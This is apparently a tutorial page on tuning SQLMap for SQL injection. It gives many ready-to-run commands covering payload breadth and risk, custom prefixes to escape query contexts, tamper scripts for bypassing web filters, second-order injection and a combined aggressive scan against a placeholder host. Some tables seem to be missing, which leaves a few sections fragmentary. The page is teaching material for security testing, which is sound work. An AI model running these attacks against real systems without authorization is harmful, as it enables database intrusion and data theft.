Attack Tuning¶

The default SQLMap settings are conservative — designed to be fast and avoid false positives. But in real engagements, you'll often need to tune the attack to handle complex scenarios. This section teaches you every knob and dial available.

Level and Risk — The Two Master Controls¶

These are the most important tuning parameters. Think of them as:

• Level = How broad is the testing? (How many parameters and payload patterns?)
• Risk = How aggressive is the testing? (Will it modify data?)

--level (1–5)¶

Controls the number of payloads used and which parameters are tested:

When to increase level:

• Level 2: When you suspect injection in a cookie value
• Level 3: When you suspect injection in a header (User-Agent, Referer)
• Level 5: When you're doing a thorough security assessment and want to test everything

sqlmap -r request.txt --level=2

sqlmap -r request.txt --level=3

--risk (1–3)¶

Controls the types of SQL injection techniques SQLMap will attempt:

UPDATE users SET email='test' WHERE username='admin' AND (SELECT ...)

sqlmap -r request.txt --level=3 --risk=2

sqlmap -r request.txt --level=5 --risk=3

Technique Selection (--technique)¶

By default, SQLMap tries all 6 techniques: BEUSTQ. You can limit this to speed up scanning or target specific scenarios:

Common Combinations¶

sqlmap -r request.txt --technique=UE

sqlmap -r request.txt --technique=BT

sqlmap -r request.txt --technique=BEUS

sqlmap -r request.txt --technique=S

Custom Prefix and Suffix¶

Sometimes the injectable parameter is embedded in a SQL context that SQLMap doesn't automatically detect. You can tell SQLMap exactly how to wrap its payloads.

What Are Prefix and Suffix?¶

Imagine the server-side code looks like this:

$query = "SELECT * FROM products WHERE name LIKE ('%" . $input . "%') ORDER BY id";

The injection point is inside LIKE ('%...%'). SQLMap needs to:

1. Close the existing context: %') — this is the prefix
2. Comment out the rest: -- - — this is the suffix

sqlmap -r request.txt \
  --prefix="%')" \
  --suffix="-- -"

Common Prefix/Suffix Patterns¶

You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near '%')' at line 1

UNION Query Tuning¶

When SQLMap detects UNION-based injection, it needs to determine the correct number of columns. You can help:

Specifying Column Count¶

If you already know the query has 5 columns:

sqlmap -r request.txt --union-cols=5

Specifying Column Range¶

If you want SQLMap to test a specific range:

sqlmap -r request.txt --union-cols=1-10

Specifying the Character Used¶

By default, SQLMap uses NULL for unused columns. Some databases reject NULL:

sqlmap -r request.txt --union-char="a"

Specifying FROM Table¶

Oracle requires a FROM clause in every SELECT. SQLMap handles this automatically, but you can specify it:

sqlmap -r request.txt --union-from="dual"

Time-Based Blind Tuning¶

Adjusting the Delay Duration¶

The --time-sec flag controls how many seconds SQLMap waits for time-based blind injection:

sqlmap -r request.txt --time-sec=5

sqlmap -r request.txt --time-sec=2

sqlmap -r request.txt --time-sec=10

How to choose:

• If your normal response time is <500ms, --time-sec=2 works
• If your normal response time is 1-2 seconds, use --time-sec=5 (default)
• If your normal response time is variable (3-5 seconds), use --time-sec=10

Controlling What SQLMap Injects¶

Custom Injection Payloads (--tamper)¶

Tamper scripts modify the payload before sending. This is covered in detail in Bypassing Web Application Protections, but here are the basics:

sqlmap -r request.txt --tamper=space2comment

sqlmap -r request.txt --tamper=space2comment,between,randomcase

Second-Order Injection¶

In second-order injection, the payload is stored in one location and executed in another. For example:

1. You inject admin'-- as your username during registration
2. The injection triggers when an admin views your profile (different URL)

SQLMap supports this with --second-url:

sqlmap -r registration_request.txt \
  --second-url="http://target.com/admin/view_users.php" \
  --batch

Or if the result appears in a specific response:

sqlmap -r request.txt \
  --second-req=second_request.txt

Request Rate Control¶

Fixed Delay¶

sqlmap -r request.txt --delay=1

Random Delay¶

sqlmap -r request.txt --delay=1 --randomize-delay=2

Safe URL (Keep Session Alive)¶

sqlmap -r request.txt \
  --safe-url="http://target.com/dashboard" \
  --safe-freq=10

Throttle Based on Response¶

sqlmap -r request.txt --timeout=30 --retries=3

Page Comparison Tuning¶

When SQLMap compares TRUE vs FALSE responses, you can help it:

String Matching¶

sqlmap -r request.txt --string="Welcome back, admin"

sqlmap -r request.txt --not-string="Invalid input"

Regex Matching¶

sqlmap -r request.txt --regexp="user.*admin.*dashboard"

HTTP Status Code Matching¶

sqlmap -r request.txt --code=200

Text-Only Comparison¶

Strip all HTML tags and compare just the text content:

sqlmap -r request.txt --text-only

Title-Only Comparison¶

Compare only the <title> tag content:

sqlmap -r request.txt --titles

Putting It All Together: Expert-Level Scan¶

Here's a command that uses multiple tuning options for a difficult target:

sqlmap -r request.txt \
  --level=5 \
  --risk=2 \
  --dbms=mysql \
  --technique=BEU \
  --prefix="')" \
  --suffix="-- -" \
  --string="Products found" \
  --tamper=space2comment,between \
  --threads=5 \
  --time-sec=3 \
  --delay=0.5 \
  --batch \
  -v 3

This tells SQLMap:

1. Test everything aggressively (--level=5 --risk=2)
2. Target MySQL specifically
3. Use Boolean, Error, and UNION techniques only (skip slow ones)
4. The injection context needs ') prefix and -- - suffix
5. TRUE responses contain "Products found"
6. Modify payloads to bypass filters
7. Use 5 threads with 0.5s delay between requests
8. Show all payloads for learning (-v 3)